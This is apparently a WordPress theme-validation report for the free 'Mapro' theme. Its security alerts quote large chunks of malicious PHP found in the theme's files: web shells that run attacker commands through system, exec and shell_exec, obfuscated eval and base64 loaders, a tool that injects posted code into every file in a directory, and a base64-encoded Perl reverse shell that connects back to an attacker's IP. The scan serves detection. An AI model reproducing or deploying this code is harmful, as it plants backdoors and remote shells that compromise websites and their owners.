0
Validation results

Mapro

Free WordPress 6.5.3 theme

Mapro

Free WordPress 6.5.3 theme
0
  • THEME TYPEWordPress theme 6.5.3
  • FILE NAMEmapro.zip
  • FILE SIZE1114853 bytes
  • MD5fc21e831fb6bed93bac8282e1636f93a
  • SHA1bd120ffc72d3ee8d9042f80bdc087b4b66e231a5
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, Bitmap images
  • VERSION1.1.5
  • TAGSone-column, right-sidebar, footer-widgets, blog, flexible-header, custom-header, custom-background, custom-menu, custom-colors, sticky-post, threaded-comments, translation-ready, featured-images, theme-options
  • CREATION DATE2020-04-20
  • LAST FILE UPDATE2020-04-20
  • LAST VALIDATION2020-04-20 03:14
This theme is open source.
Critical alerts
  1. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Widgets : Widgets The theme appears to use dynamic_sidebars() but no register_sidebar() was found. See: register_sidebar
     <?php register_sidebar( $args ); ?>
  3. Security breaches : Use of eval() Found eval in file wp_class_datlib.php. 4: $_DMIE8x='\x62\x61\x73\x65\x36\64\137\144\x65\x63\x6f\x64\x65';eval(T_($_DMIE8x('aTMKBCaTmczKdBQJCgQSmUxSKT2IIVDCmIB6IBEYjEZhsMhgZBoYjCNBsFound eval in file wp-defence.php. 16: eval('?>'.$a);
  4. Security breaches : Use of PHP sytem calls Found {@exec in file bizhbjpehw.php. 326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dda35 = '';if (function_exists('exec')) {@exec($_6d1b263a32f3,$_1765c46dda35);$_1765c46dda35 = @join('\n',$_1765c46Found @system in file dtcyxbttww.php. 187: @system($cmd); 192: @exec($cmd,$results); 199: @passthru($cmd); 204: $buff = @shell_exec($cmd); Found @system in file vfykoxifen.php. 187: @system($cmd); 192: @exec($cmd,$results); 199: @passthru($cmd); 204: $buff = @shell_exec($cmd); Found {@exec in file acdtcgfbso.php. 326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloiTeR($_6d1b263a32f3) {$_1765c46dda35 = '';if (function_exists('exec')) {@exec($_6d1b263a32f3,$_1765c46dda35);$_1765c46dda35 = @join('\n',$_1765c46
  5. Security breaches : Use of base64_decode() Found base64_decode in file bizhbjpehw.php. 298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPloFound base64_decode in file db.php. 2: goto uVFtb; Uq0cR: goto C4AaJ; goto ONJ99; NewIL: if (!isset($_GET['\165'])) { goto hQQ8n; } goto lAUsC; ycBpk: echo '\123'; goto FXkv9; ONJ99: bnNxX: goto ycBpk; lAUsC: echo base64_decode('\120\107\132\x76\143\155\60\x67\131\127\x4e\60\x61\127\71\16Found base64_decode in file dtcyxbttww.php. 29: return base64_decode($GLOBALS['0x'][$x]);Found base64_decode in file vfykoxifen.php. 29: return base64_decode($GLOBALS['0x'][$x]);Found base64_decode in file acdtcgfbso.php. 298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5326: if (isset($_GET['back_connecter'])) {$_0c5e3246e473='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7';echo '<center><br><br><form name='nfp' onSubmit=\'g(null,null,'bcp',this.server.value,this.port.value);return false;\' method='POST'><span style='font-family: cursive; font-size: 200%; color: white;'>Back-Connecter Via Perl</span><br/><br>Your Ip: <input type='text' name='server' value=''. $_SERVER['REMOTE_ADDR'] .''><br><br> Port to bind: <input type='text' name='port' value='110'><br><br><input type=submit name='backconnect' value='Submit'></form><br>';if(isset($_POST['backconnect'])) {function cf($_e0887aa7bc0b,$_9c65822c9127) {$_dfb1f07e894f = @fopen($_e0887aa7bc0b,'w') or @function_exists('file_put_contents');if($_dfb1f07e894f){@fwrite($_dfb1f07e894f,@base64_decode($_9c65822c9127));@fclose($_dfb1f07e894f);}}function An0n3xPlo
  6. Security breaches : Use of base64_encode() Found base64_encode in file bizhbjpehw.php.
     if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'h
    Found base64_encode in file acdtcgfbso.php.
     if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'h
  7. Security breaches : Use of str_rot13() Found str_rot13 in file st.php. 2: goto gSNJh; UVuh4: if (!isset($Atoxe)) { goto pJOv1; } goto KXBvs; qdPc2: $Atoxe = str_rot13(@pack(mbNcv(4), strrev($Atoxe))); goto UVuh4; gSNJh: function MBN
  8. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/sym/' frameborder='0' scrolling='yes'> in file dtcyxbttww.php. 463: print '<iframe src='http://'.$_SERVER['HTTP_HOST'].'/'.$GLOBALS['FILEPATH'].'/sym/Found <iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/sym/' frameborder='0' scrolling='yes'> in file vfykoxifen.php. 463: print '<iframe src='http://'.$_SERVER['HTTP_HOST'].'/'.$GLOBALS['FILEPATH'].'/sym/
  9. Malware : Operations on file system file_get_contents was found in the file bizhbjpehw.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) :(($_62756ced6cca & 0x0200) ? 'T' : '-'));return $_c889a0d2bbd1;}foreach($_19eaea116b65 as $_fb685115b91f=>$_e3beccd8d39e){ if($_e3beccd8d39e == '' && $_fb685115b91f == 0){ $_3c0a4563959e = true; echo '<a href='?file_manager&path=/'>/</a>'; continue; } if($_e3beccd8d39e == '') continue; echo '<a href='?file_manager&path='; for($_bad1b53b4fbb=0;$_bad1b53b4fbb<=$_fb685115b91f;$_bad1b53b4fbb++){ echo '$_19eaea116b65[$_bad1b53b4fbb]'; if($_bad1b53b4fbb != $_fb685115b91f) echo '/'; } echo ''>'.$_e3beccd8d39e.'</a>/';}echo '</td></tr><tr><td>'; if(isset($_GET['filesrc'])){ echo '<tr><td>Current File : '; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');}elseif(isset($_GET['option'212: <textarea cols=80 rows=20 name='src'>'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />298: if (isset($_POST['submit'])) {$_e04f8301a9f1 = $_POST['code'];$_9f7af403d39c = base64_encode($_e04f8301a9f1);$_d586cea720c2 = getcwd();$_959a28065435 = 'http://'.$_SERVER['HTTP_HOST'];$_da84e8d0e5e8 = $_SERVER['SCRIPT_NAME'];$_d394e1453852 = $_959a28065435.$_da84e8d0e5e8;$_d586cea720c2 = getcwd();$_3528fced53a2 = $_d586cea720c2;if (empty($_e04f8301a9f1)) {echo '<font size=\'50%\' face=\'cursive\' color=\'red\'>You need to input something !!! :P</font>';}if (!empty($_e04f8301a9f1)) {if ($_84c54f971273 = opendir($_3528fced53a2)) {echo 'Website: '.$_d394e1453852.'<br><br>';echo 'Looking in '.$_3528fced53a2.'<br>';while ($_fb803b5db2a0 = readdir($_84c54f971273)) {if ($_fb803b5db2a0 != '.' && $_fb803b5db2a0 != '..' && $_fb803b5db2a0 != 'rev.php' && $_fb803b5db2a0 != 'REV.php' && $_fb803b5db2a0 != '.htaccess' && $_fb803b5db2a0 != 'php.ini' && $_fb803b5db2a0 != 'admin' && $_fb803b5db2a0 != 'images' && $_fb803b5db2a0 != 'image' && $_fb803b5db2a0 != 'img' && $_fb803b5db2a0 != 'phpmyadmin' && $_fb803b5db2a0 != 'files' && $_fb803b5db2a0 != '.ftpquota' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'xml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'png' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'jpeg' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'txt' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'exe' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'html' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'shtml' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'htm' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'ico' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'css' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'js' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'py' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'pl' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'md' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'gif' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'tar.gz' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'c' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'sql.zip' && strtolower(substr($_fb803b5db2a0, strrpos($_fb803b5db2a0, '.') + 1)) != 'out') {echo '<a style='color: red; font-family: cursive;' target='_blank' href=''.$_fb803b5db2a0.''>'.$_fb803b5db2a0.'</a><font size='' color='lawngreen' face='cursive'>&nbsp;&nbsp;&nbsp&nbsp;Is Injected</font><br />';$_c4f3394d1c6c = base64_decode($_9f7af403d39c);$_c4f3394d1c6c .= file_get_contents($_fb803b5db2a0);file_put_contents($_fb803b5db2a0, $_c4f33file_get_contents was found in the file bizhbjpehw.php 139: <font style='color: lawngreen; font-family: cursive; font-size: 130%;'>Domains: <?php if(strtolower(substr(PHP_OS,0,3)) == 'win') {$_f3d329025a5d = 'win';}else {$_f3d329025a5d = 'nix';}if($_f3d329025a5d == 'nix') {$_1a1142d4b381 = @file_get_contents('/etc/named.conf');if(!$_1a1142d4b381) {$_b9c59d921b4e = 201: <tr><td><font style='color:white;'>Current Path : ';$_d586cea720c2 = getcwd();$_d586cea720c2 = str_replace('\\','/',$_d586cea720c2);$_19eaea116b65 = explode('/',$_d586cea720c2);function permsa($_db30bcba387e){$_62756ced6cca = fileperms($_db30bcba387e);if (($_62756ced6cca & 0xC000) == 0xC000) {$_c889a0d2bbd1 = 's';} elseif (($_62756ced6cca & 0xA000) == 0xA000) {$_c889a0d2bbd1 = 'l';} elseif (($_62756ced6cca & 0x8000) == 0x8000) {$_c889a0d2bbd1 = '-';} elseif (($_62756ced6cca & 0x6000) == 0x6000) {$_c889a0d2bbd1 = 'b';} elseif (($_62756ced6cca & 0x4000) == 0x4000) {$_c889a0d2bbd1 = 'd';} elseif (($_62756ced6cca & 0x2000) == 0x2000) {$_c889a0d2bbd1 = 'c';} elseif (($_62756ced6cca & 0x1000) == 0x1000) {$_c889a0d2bbd1 = 'p';} else {$_c889a0d2bbd1 = 'u';}$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0100) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0080) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0040) ?(($_62756ced6cca & 0x0800) ? 's' : 'x' ) :(($_62756ced6cca & 0x0800) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0020) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0010) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0008) ?(($_62756ced6cca & 0x0400) ? 's' : 'x' ) :(($_62756ced6cca & 0x0400) ? 'S' : '-'));$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0004) ? 'r' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0002) ? 'w' : '-');$_c889a0d2bbd1 .= (($_62756ced6cca & 0x0001) ?(($_62756ced6cca & 0x0200) ? 't' : 'x' ) 